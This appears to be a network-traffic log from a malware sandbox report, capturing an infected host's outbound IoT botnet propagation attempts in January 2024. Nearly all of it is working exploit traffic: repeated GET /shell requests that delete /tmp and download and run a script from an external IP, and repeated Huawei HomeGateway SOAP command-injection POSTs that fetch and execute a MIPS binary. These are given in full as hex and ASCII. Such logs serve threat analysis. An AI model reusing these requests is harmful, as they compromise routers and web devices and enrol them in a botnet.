                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1192.168.2.2348674167.172.137.11180
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:23:49.370306015 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:23:49.533899069 CET321INHTTP/1.1 400 Bad Request
                                                          Server: nginx/1.22.1
                                                          Date: Tue, 02 Jan 2024 05:23:49 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 157
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.22.1</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2192.168.2.2345530151.101.7.16680
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:23:49.491266966 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:23:49.611929893 CET167INHTTP/1.1 400 Bad Request
                                                          Connection: close
                                                          Content-Length: 11
                                                          content-type: text/plain; charset=utf-8
                                                          x-served-by: cache-dfw-kdfw8210169
                                                          Data Raw: 42 61 64 20 52 65 71 75 65 73 74
                                                          Data Ascii: Bad Request


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3192.168.2.2340968130.211.15.9580
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:23:49.492482901 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:23:49.614605904 CET441INHTTP/1.0 400 Bad Request
                                                          Content-Type: text/html; charset=UTF-8
                                                          Referrer-Policy: no-referrer
                                                          Content-Length: 273
                                                          Date: Tue, 02 Jan 2024 05:23:49 GMT
                                                          Data Raw: 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 74 65 78 74 3d 23 30 30 30 30 30 30 20 62 67 63 6f 6c 6f 72 3d 23 66 66 66 66 66 66 3e 0a 3c 68 31 3e 45 72 72 6f 72 3a 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 68 32 3e 59 6f 75 72 20 63 6c 69 65 6e 74 20 68 61 73 20 69 73 73 75 65 64 20 61 20 6d 61 6c 66 6f 72 6d 65 64 20 6f 72 20 69 6c 6c 65 67 61 6c 20 72 65 71 75 65 73 74 2e 3c 2f 68 32 3e 0a 3c 68 32 3e 3c 2f 68 32 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <html><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><title>400 Bad Request</title></head><body text=#000000 bgcolor=#ffffff><h1>Error: Bad Request</h1><h2>Your client has issued a malformed or illegal request.</h2><h2></h2></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4192.168.2.2348512156.241.14.15337215
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:23:49.692229986 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:23:51.249967098 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:23:53.105700970 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:23:56.817178965 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:24:04.240128994 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:24:19.086045980 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:24:48.777913094 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
